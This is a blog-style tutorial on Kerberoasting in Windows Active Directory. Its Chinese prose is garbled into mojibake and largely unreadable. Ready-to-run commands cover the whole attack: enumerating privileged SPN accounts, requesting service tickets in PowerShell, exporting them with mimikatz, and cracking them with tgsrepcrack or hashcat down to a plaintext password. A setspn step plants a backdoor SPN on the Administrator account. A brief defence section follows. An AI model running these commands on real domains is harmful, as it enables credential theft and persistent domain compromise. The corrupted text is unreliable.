I"ß=<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>Kerberoastingæ˜¯åŸŸæ¸—é€ä¸­ç»å¸¸ä½¿ç”¨çš„ä¸€é¡¹æŠ€æœ¯ï¼Œæœ¬æ–‡å°†å‚è€ƒå…¬å¼€çš„èµ„æ–™ï¼Œç»“åˆè‡ªå·±çš„ç†è§£ï¼Œè¯¦ç»†ä»‹ç»Kerberoastingçš„åŸç†å’Œå®ç°ï¼Œä»¥åŠä¸€ä¸ªåé—¨åˆ©ç”¨çš„æ–¹æ³•ï¼Œæœ€åç»™å‡ºé˜²å¾¡å»ºè®®ã€‚</p>

<p>å‚è€ƒèµ„æ–™ï¼š</p>

<p>http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/</p>

<p>http://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/</p>

<p>https://malicious.link/post/2016/kerberoast-pt1/</p>

<p>https://malicious.link/post/2016/kerberoast-pt2/</p>

<p>https://malicious.link/post/2016/kerberoast-pt3/</p>

<p>https://adsecurity.org/?p=3458</p>

<p>https://adsecurity.org/?page_id=183</p>

<p>https://blog.netspi.com/faster-domain-escalation-using-ldap/</p>

<p>https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>Kerberoastingç›¸å…³æ¦‚å¿µ</li>
  <li>Kerberoastingçš„åŸç†</li>
  <li>Kerberoastingçš„å®ç°</li>
  <li>Kerberoastingçš„åé—¨åˆ©ç”¨</li>
  <li>Kerberoastingçš„é˜²å¾¡</li>
</ul>

<h2 id="0x02-åŸºæœ¬æ¦‚å¿µ">0x02 åŸºæœ¬æ¦‚å¿µ</h2>
<hr />

<h3 id="spn">SPN</h3>

<p>å®˜æ–¹æ–‡æ¡£ï¼š</p>

<p>https://docs.microsoft.com/en-us/windows/desktop/AD/service-principal-names</p>

<p>å…¨ç§°<code class="language-plaintext highlighter-rouge">Service Principal Names</code></p>

<p>SPNæ˜¯æœåŠ¡å™¨ä¸Šæ‰€è¿è¡ŒæœåŠ¡çš„å”¯ä¸€æ ‡è¯†ï¼Œæ¯ä¸ªä½¿ç”¨Kerberosçš„æœåŠ¡éƒ½éœ€è¦ä¸€ä¸ªSPN</p>

<p>SPNåˆ†ä¸ºä¸¤ç§ï¼Œä¸€ç§æ³¨å†Œåœ¨ADä¸Šæœºå™¨å¸æˆ·(Computers)ä¸‹ï¼Œå¦ä¸€ç§æ³¨å†Œåœ¨åŸŸç”¨æˆ·å¸æˆ·(Users)ä¸‹</p>

<p>å½“ä¸€ä¸ªæœåŠ¡çš„æƒé™ä¸º<code class="language-plaintext highlighter-rouge">Local System</code>æˆ–<code class="language-plaintext highlighter-rouge">Network Service</code>ï¼Œåˆ™SPNæ³¨å†Œåœ¨æœºå™¨å¸æˆ·(Computers)ä¸‹</p>

<p>å½“ä¸€ä¸ªæœåŠ¡çš„æƒé™ä¸ºä¸€ä¸ªåŸŸç”¨æˆ·ï¼Œåˆ™SPNæ³¨å†Œåœ¨åŸŸç”¨æˆ·å¸æˆ·(Users)ä¸‹</p>

<h3 id="spnçš„æ ¼å¼">SPNçš„æ ¼å¼</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>serviceclass/host:port/servicename
</code></pre></div></div>

<p>è¯´æ˜ï¼š</p>

<ul>
  <li>serviceclasså¯ä»¥ç†è§£ä¸ºæœåŠ¡çš„åç§°ï¼Œå¸¸è§çš„æœ‰www, ldap, SMTP, DNS, HOSTç­‰</li>
  <li>hostæœ‰ä¸¤ç§å½¢å¼ï¼ŒFQDNå’ŒNetBIOSåï¼Œä¾‹å¦‚server01.test.comå’Œserver01</li>
  <li>å¦‚æœæœåŠ¡è¿è¡Œåœ¨é»˜è®¤ç«¯å£ä¸Šï¼Œåˆ™ç«¯å£å·(port)å¯ä»¥çœç•¥</li>
</ul>

<h3 id="æŸ¥è¯¢spn">æŸ¥è¯¢SPN</h3>

<p>å¯¹åŸŸæ§åˆ¶å™¨å‘èµ·LDAPæŸ¥è¯¢ï¼Œè¿™æ˜¯æ­£å¸¸kerberosç¥¨æ®è¡Œä¸ºçš„ä¸€éƒ¨åˆ†ï¼Œå› æ­¤æŸ¥è¯¢SPNçš„æ“ä½œå¾ˆéš¾è¢«æ£€æµ‹</p>

<h4 id="1-ä½¿ç”¨setspn">(1) ä½¿ç”¨SetSPN</h4>

<p>Win7å’ŒWindows Server2008è‡ªå¸¦çš„å·¥å…·</p>

<p>æŸ¥çœ‹å½“å‰åŸŸå†…çš„æ‰€æœ‰SPNï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setspn.exe -q */*
</code></pre></div></div>

<p>æŸ¥çœ‹teståŸŸå†…çš„æ‰€æœ‰SPNï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setspn.exe -T test -q */*
</code></pre></div></div>

<p>è¾“å‡ºç»“æœå®ä¾‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CN=DC1,OU=Domain Controllers,DC=test,DC=com
        exchangeRFR/DC1
        exchangeRFR/DC1.test.com
        exchangeMDB/DC1.test.com
        exchangeMDB/DC1
        exchangeAB/DC1
        exchangeAB/DC1.test.com
        SMTP/DC1
        SMTP/DC1.test.com
        SmtpSvc/DC1
        SmtpSvc/DC1.test.com
        ldap/DC1.test.com/ForestDnsZones.test.com
        ldap/DC1.test.com/DomainDnsZones.test.com
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC1.test.com
        DNS/DC1.test.com
        GC/DC1.test.com/test.com
        RestrictedKrbHost/DC1.test.com
        RestrictedKrbHost/DC1
        HOST/DC1/TEST
        HOST/DC1.test.com/TEST
        HOST/DC1
        HOST/DC1.test.com
        HOST/DC1.test.com/test.com
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/0f33253b-2314-40f0-b665-f4317b13e6b9/test.com
        ldap/DC1/TEST
        ldap/0f33253b-2314-40f0-b665-f4317b13e6b9._msdcs.test.com
        ldap/DC1.test.com/TEST
        ldap/DC1
        ldap/DC1.test.com
        ldap/DC1.test.com/test.com
CN=krbtgt,CN=Users,DC=test,DC=com
        kadmin/changepw
CN=COMPUTER01,CN=Computers,DC=test,DC=com
        RestrictedKrbHost/COMPUTER01
        HOST/COMPUTER01
        RestrictedKrbHost/COMPUTER01.test.com
        HOST/COMPUTER01.test.com
CN=MSSQL Service Admin,CN=Users,DC=test,DC=com
        MSSQLSvc/DC1.test.com
</code></pre></div></div>

<p>ä»¥CNå¼€å¤´çš„æ¯ä¸€è¡Œä»£è¡¨ä¸€ä¸ªå¸æˆ·ï¼Œå…¶ä¸‹çš„ä¿¡æ¯æ˜¯ä¸è¯¥å¸æˆ·ç›¸å…³è”çš„SPN</p>

<p>å¯¹äºä¸Šé¢çš„è¾“å‡ºæ•°æ®ï¼Œæœºå™¨å¸æˆ·(Computers)ä¸ºï¼š</p>

<ul>
  <li>CN=DC1,OU=Domain Controllers,DC=test,DC=com</li>
  <li>CN=COMPUTER01,CN=Computers,DC=test,DC=com</li>
</ul>

<p>åŸŸç”¨æˆ·å¸æˆ·(Users)ä¸ºï¼š</p>

<ul>
  <li>CN=krbtgt,CN=Users,DC=test,DC=com</li>
  <li>CN=MSSQL Service Admin,CN=Users,DC=test,DC=com</li>
</ul>

<p>æ³¨å†Œåœ¨åŸŸç”¨æˆ·å¸æˆ·(Users)ä¸‹çš„SPNæœ‰ä¸¤ä¸ªï¼š<code class="language-plaintext highlighter-rouge">kadmin/changepw</code>å’Œ<code class="language-plaintext highlighter-rouge">MSSQLSvc/DC1.test.com</code></p>

<h2 id="0x03-kerberoastingçš„åŸç†">0x03 Kerberoastingçš„åŸç†</h2>
<hr />

<h4 id="1kerberosè®¤è¯è¿‡ç¨‹">1ã€Kerberosè®¤è¯è¿‡ç¨‹</h4>

<p>ä¸€ä¸ªç®€å•çš„Kerberosè®¤è¯è¿‡ç¨‹å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-1-15/2-1.png" alt="Alt text" /></p>

<ol>
  <li>as_request</li>
  <li>as_reply</li>
  <li>tgs_request</li>
  <li>tgs_reply</li>
  <li>ap_request</li>
  <li>ap_reply</li>
</ol>

<p>å¯¹äº4.tgs_replyï¼Œç”¨æˆ·å°†ä¼šæ”¶åˆ°ç”±ç›®æ ‡æœåŠ¡å®ä¾‹çš„NTLM hashåŠ å¯†ç”Ÿæˆçš„TGS(service ticket)ï¼ŒåŠ å¯†ç®—æ³•ä¸º<code class="language-plaintext highlighter-rouge">RC4-HMAC</code></p>

<p>ç«™åœ¨åˆ©ç”¨çš„è§’åº¦ï¼Œå½“è·å¾—è¿™ä¸ªTGSåï¼Œæˆ‘ä»¬å¯ä»¥å°è¯•ç©·ä¸¾å£ä»¤ï¼Œæ¨¡æ‹ŸåŠ å¯†è¿‡ç¨‹ï¼Œç”ŸæˆTGSè¿›è¡Œæ¯”è¾ƒã€‚å¦‚æœTGSç›¸åŒï¼Œä»£è¡¨å£ä»¤æ­£ç¡®ï¼Œå°±èƒ½è·å¾—ç›®æ ‡æœåŠ¡å®ä¾‹çš„æ˜æ–‡å£ä»¤</p>

<h4 id="2windowsç³»ç»Ÿé€šè¿‡spnæŸ¥è¯¢è·å¾—æœåŠ¡å’ŒæœåŠ¡å®ä¾‹å¸æˆ·çš„å¯¹åº”å…³ç³»">2ã€Windowsç³»ç»Ÿé€šè¿‡SPNæŸ¥è¯¢è·å¾—æœåŠ¡å’ŒæœåŠ¡å®ä¾‹å¸æˆ·çš„å¯¹åº”å…³ç³»</h4>

<p>è¿™é‡Œä¸¾ä¸€ä¸ªä¾‹å­ï¼š</p>

<p>ç”¨æˆ·aè¦è®¿é—®MySQLæœåŠ¡çš„èµ„æºï¼Œè¿›è¡Œåˆ°4.tgs_replyæ—¶ï¼Œæ­¥éª¤å¦‚ä¸‹ï¼š</p>

<p>(1)Domain ControlleræŸ¥è¯¢MySQLæœåŠ¡çš„SPN</p>

<p>å¦‚æœè¯¥SPNæ³¨å†Œåœ¨æœºå™¨å¸æˆ·(Computers)ä¸‹ï¼Œå°†ä¼šæŸ¥è¯¢æ‰€æœ‰æœºå™¨å¸æˆ·(Computers)çš„servicePrincipalNameå±æ€§ï¼Œæ‰¾åˆ°å¯¹åº”çš„å¸æˆ·</p>

<p>å¦‚æœè¯¥SPNæ³¨å†Œåœ¨åŸŸç”¨æˆ·å¸æˆ·(Users)ä¸‹ï¼Œå°†ä¼šæŸ¥è¯¢æ‰€æœ‰åŸŸç”¨æˆ·(Users)çš„servicePrincipalNameå±æ€§ï¼Œæ‰¾åˆ°å¯¹åº”çš„å¸æˆ·</p>

<p>(2)æ‰¾åˆ°å¯¹åº”çš„å¸æˆ·åï¼Œä½¿ç”¨è¯¥å¸æˆ·çš„NTLM hashï¼Œç”ŸæˆTGS</p>

<h4 id="3åŸŸå†…çš„ä¸»æœºéƒ½èƒ½æŸ¥è¯¢spn">3ã€åŸŸå†…çš„ä¸»æœºéƒ½èƒ½æŸ¥è¯¢SPN</h4>

<h4 id="4åŸŸå†…çš„ä»»ä½•ç”¨æˆ·éƒ½å¯ä»¥å‘åŸŸå†…çš„ä»»ä½•æœåŠ¡è¯·æ±‚tgs">4ã€åŸŸå†…çš„ä»»ä½•ç”¨æˆ·éƒ½å¯ä»¥å‘åŸŸå†…çš„ä»»ä½•æœåŠ¡è¯·æ±‚TGS</h4>

<p>ç»¼ä¸Šï¼ŒåŸŸå†…çš„ä»»ä½•ä¸€å°ä¸»æœºï¼Œéƒ½èƒ½å¤Ÿé€šè¿‡æŸ¥è¯¢SPNï¼Œå‘åŸŸå†…çš„æ‰€æœ‰æœåŠ¡è¯·æ±‚TGSï¼Œæ‹¿åˆ°TGSåå¯¹å…¶è¿›è¡Œæš´åŠ›ç ´è§£</p>

<p>å¯¹äºç ´è§£å‡ºçš„æ˜æ–‡å£ä»¤ï¼Œåªæœ‰åŸŸç”¨æˆ·å¸æˆ·(Users)çš„å£ä»¤å­˜åœ¨ä»·å€¼ï¼Œä¸å¿…è€ƒè™‘æœºå™¨å¸æˆ·çš„å£ä»¤(æ— æ³•ç”¨äºè¿œç¨‹è¿æ¥)</p>

<p>å› æ­¤ï¼Œé«˜æ•ˆç‡çš„åˆ©ç”¨æ€è·¯å¦‚ä¸‹ï¼š</p>

<ol>
  <li>æŸ¥è¯¢SPNï¼Œæ‰¾åˆ°æœ‰ä»·å€¼çš„SPNï¼Œéœ€è¦æ»¡è¶³ä»¥ä¸‹æ¡ä»¶ï¼š
    <ul>
      <li>è¯¥SPNæ³¨å†Œåœ¨åŸŸç”¨æˆ·å¸æˆ·(Users)ä¸‹</li>
      <li>åŸŸç”¨æˆ·è´¦æˆ·çš„æƒé™å¾ˆé«˜</li>
    </ul>
  </li>
  <li>è¯·æ±‚TGS</li>
  <li>å¯¼å‡ºTGS</li>
  <li>æš´åŠ›ç ´è§£</li>
</ol>

<h2 id="0x04-kerberoastingçš„å®ç°æ–¹æ³•ä¸€">0x04 Kerberoastingçš„å®ç°æ–¹æ³•ä¸€</h2>
<hr />

<h3 id="1è·å¾—æœ‰ä»·å€¼çš„spn">1ã€è·å¾—æœ‰ä»·å€¼çš„SPN</h3>

<p>éœ€è¦æ»¡è¶³ä»¥ä¸‹æ¡ä»¶ï¼š</p>

<ul>
  <li>è¯¥SPNæ³¨å†Œåœ¨åŸŸç”¨æˆ·å¸æˆ·(Users)ä¸‹</li>
  <li>åŸŸç”¨æˆ·è´¦æˆ·çš„æƒé™å¾ˆé«˜</li>
</ul>

<p>å¯ä»¥é€‰æ‹©ä»¥ä¸‹ä¸‰ç§æ–¹æ³•ï¼š</p>

<h4 id="1ä½¿ç”¨powershellæ¨¡å—active-directory">(1)ä½¿ç”¨powershellæ¨¡å—Active Directory</h4>

<p><strong>æ³¨ï¼š</strong></p>

<p>powershellæ¨¡å—Active Directory éœ€è¦æå‰å®‰è£…ï¼ŒåŸŸæ§åˆ¶å™¨ä¸€èˆ¬ä¼šå®‰è£…</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import-module ActiveDirectory
get-aduser -filter {AdminCount -eq 1 -and (servicePrincipalName -ne 0)} -prop * |select name,whencreated,pwdlastset,lastlogon
</code></pre></div></div>

<p>å¯¹äºæœªå®‰è£…Active Directoryæ¨¡å—çš„ç³»ç»Ÿï¼Œå¯ä»¥é€šè¿‡å¦‚ä¸‹å‘½ä»¤å¯¼å…¥Active Directoryæ¨¡å—ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import-module .\Microsoft.ActiveDirectory.Management.dll
</code></pre></div></div>

<p>Microsoft.ActiveDirectory.Management.dllåœ¨å®‰è£…powershellæ¨¡å—Active Directoryåç”Ÿæˆï¼Œæˆ‘å·²ç»æå–å‡ºæ¥å¹¶ä¸Šä¼ è‡³githubï¼š</p>

<p>https://github.com/3gstudent/test/blob/master/Microsoft.ActiveDirectory.Management.dll</p>

<h4 id="2ä½¿ç”¨powerview">(2)ä½¿ç”¨PowerView</h4>

<p>https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon
</code></pre></div></div>

<h4 id="3ä½¿ç”¨kerberoast">(3)ä½¿ç”¨kerberoast</h4>

<p>powershell:</p>

<p>https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1</p>

<p>vbs:</p>

<p>https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.vbs</p>

<p>å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cscript GetUserSPNs.vbs
</code></pre></div></div>

<h3 id="2è¯·æ±‚tgs">2ã€è¯·æ±‚TGS</h3>

<h4 id="1è¯·æ±‚æŒ‡å®štgs">(1)è¯·æ±‚æŒ‡å®šTGS</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$SPNName = 'MSSQLSvc/DC1.test.com'
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName
</code></pre></div></div>

<h4 id="2è¯·æ±‚æ‰€æœ‰tgs">(2)è¯·æ±‚æ‰€æœ‰TGS</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Add-Type -AssemblyName System.IdentityModel  
setspn.exe -q */* | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  
</code></pre></div></div>

<p>æ‰§è¡Œåè¾“å…¥<code class="language-plaintext highlighter-rouge">klist</code>æŸ¥çœ‹å†…å­˜ä¸­çš„ç¥¨æ®ï¼Œå¯æ‰¾åˆ°è·å¾—çš„TGS</p>

<h3 id="3å¯¼å‡º">3ã€å¯¼å‡º</h3>

<p>ä½¿ç”¨mimikatz</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kerberos::list /export
</code></pre></div></div>

<h3 id="4ç ´è§£">4ã€ç ´è§£</h3>

<p>https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./tgsrepcrack.py wordlist.txt test.kirbi
</code></pre></div></div>

<h2 id="0x05-kerberoastingçš„å®ç°æ–¹æ³•äºŒ">0x05 Kerberoastingçš„å®ç°æ–¹æ³•äºŒ</h2>
<hr />

<p>è‡ªåŠ¨å®ç°ï¼Œå¹¶ä¸”ä¸éœ€è¦mimikatzï¼Œæ™®é€šç”¨æˆ·æƒé™å³å¯ï¼Œå‚è€ƒèµ„æ–™ï¼š</p>

<p>http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/</p>

<p>ä»£ç åœ°å€ï¼š</p>

<p>https://github.com/EmpireProject/Empire/commit/6ee7e036607a62b0192daed46d3711afc65c3921</p>

<p>ä½¿ç”¨<code class="language-plaintext highlighter-rouge">System.IdentityModel.Tokens.KerberosRequestorSecurityToken</code>è¯·æ±‚TGSï¼Œåœ¨è¿”å›ç»“æœä¸­æå–å‡ºTGSï¼Œè¾“å‡ºçš„TGSå¯é€‰æ‹©John the Ripperæˆ–Hashcatè¿›è¡Œç ´è§£</p>

<p>å®ä¾‹æ¼”ç¤ºï¼š</p>

<p>åœ¨åŸŸå†…ä¸€å°ä¸»æœºä¸Šä»¥æ™®é€šç”¨æˆ·æƒé™æ‰§è¡Œï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl
</code></pre></div></div>

<p>-AdminCountè¡¨ç¤ºé€‰æ‹©é«˜æƒé™çš„ç”¨æˆ·</p>

<p>è¾“å‡ºç»“æœå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-1-15/2-2.png" alt="Alt text" /></p>

<p>åªæå–å‡ºhashçš„å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation
</code></pre></div></div>

<p>è¾“å‡ºç»“æœå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-1-15/2-3.png" alt="Alt text" /></p>

<p>ä½¿ç”¨hashcatç ´è§£çš„å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hashcat -m 13100 /tmp/hash.txt /tmp/password.list -o found.txt --force
</code></pre></div></div>

<p>ç ´è§£ç»“æœå¦‚ä¸‹å›¾ï¼ŒæˆåŠŸè·å¾—æ˜æ–‡å£ä»¤<code class="language-plaintext highlighter-rouge">MySQLAdmin111!</code></p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-1-15/2-4.png" alt="Alt text" /></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>Rubeusä¹Ÿå¯ä»¥å®ç°Invoke-Kerberoastçš„åŠŸèƒ½ï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/GhostPack/Rubeus</p>

<p>å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Rubeus.exe kerberoast
</code></pre></div></div>

<h2 id="0x06-kerberoastingçš„åé—¨åˆ©ç”¨">0x06 Kerberoastingçš„åé—¨åˆ©ç”¨</h2>
<hr />

<p>åœ¨æˆ‘ä»¬å–å¾—äº†SPNçš„ä¿®æ”¹æƒé™åï¼Œå¯ä»¥ä¸ºæŒ‡å®šçš„åŸŸç”¨æˆ·æ·»åŠ ä¸€ä¸ªSPNï¼Œè¿™æ ·å¯ä»¥éšæ—¶è·å¾—è¯¥åŸŸç”¨æˆ·çš„TGSï¼Œç»è¿‡ç ´è§£åè·å¾—æ˜æ–‡å£ä»¤</p>

<p>ä¾‹å¦‚ä¸ºåŸŸç”¨æˆ·<code class="language-plaintext highlighter-rouge">Administrator</code>æ·»åŠ <code class="language-plaintext highlighter-rouge">SPNVNC/DC1.test.com</code>ï¼Œå‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setspn.exe -U -A VNC/DC1.test.com Administrator
</code></pre></div></div>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-1-15/3-1.png" alt="Alt text" /></p>

<p>åœ¨åŸŸå†…ä»»æ„ä¸€å°ä¸»æœºéƒ½èƒ½è·å¾—è¯¥SPNï¼Œå¹¶ä¸”èƒ½å¤Ÿä½¿ç”¨Kerberoastè·å¾—TGSï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-1-15/3-2.png" alt="Alt text" /></p>

<p>å†ä½¿ç”¨hashcatç ´è§£å³å¯</p>

<p><strong>è¡¥å……ï¼š</strong></p>

<p>åˆ é™¤SPNçš„å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setspn.exe -D VNC/DC1.test.com Administrator
</code></pre></div></div>

<h2 id="0x07-é˜²å¾¡">0x07 é˜²å¾¡</h2>
<hr />

<p>ç«™åœ¨é˜²å¾¡çš„è§’åº¦ï¼Œä¸å¯èƒ½é˜»æ­¢kerberoastï¼Œä½†å¯ä»¥å¯¹æœ‰æ”»å‡»ä»·å€¼çš„SPN(æ³¨å†Œåœ¨åŸŸç”¨æˆ·å¸æˆ·ä¸‹ï¼Œæƒé™é«˜)ï¼Œå¢åŠ å¯†ç é•¿åº¦ï¼Œèƒ½å¤Ÿæé«˜ç ´è§£éš¾åº¦ï¼Œå¹¶ä¸”å®šæœŸä¿®æ”¹å…³è”çš„åŸŸç”¨æˆ·å£ä»¤</p>

<p>ç®¡ç†å‘˜å¯åœ¨åŸŸå†…ä¸€å°ä¸»æœºä¸Šä½¿ç”¨Invoke-Kerberoastæ£€æŸ¥æ˜¯å¦å­˜åœ¨å±é™©çš„SPN</p>

<p>ä¸‹è½½åœ°å€ï¼š</p>

<p>https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1</p>

<p>å‚æ•°ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon
</code></pre></div></div>

<h2 id="0x08-å°ç»“">0x08 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡å¯¹Kerberoastingçš„åŸç†ã€æ–¹æ³•å’Œé˜²å¾¡ä½œäº†è¯¦ç»†ä»‹ç»ï¼Œå¹¶è¿›è¡Œäº†å®ä¾‹æ¼”ç¤ºã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET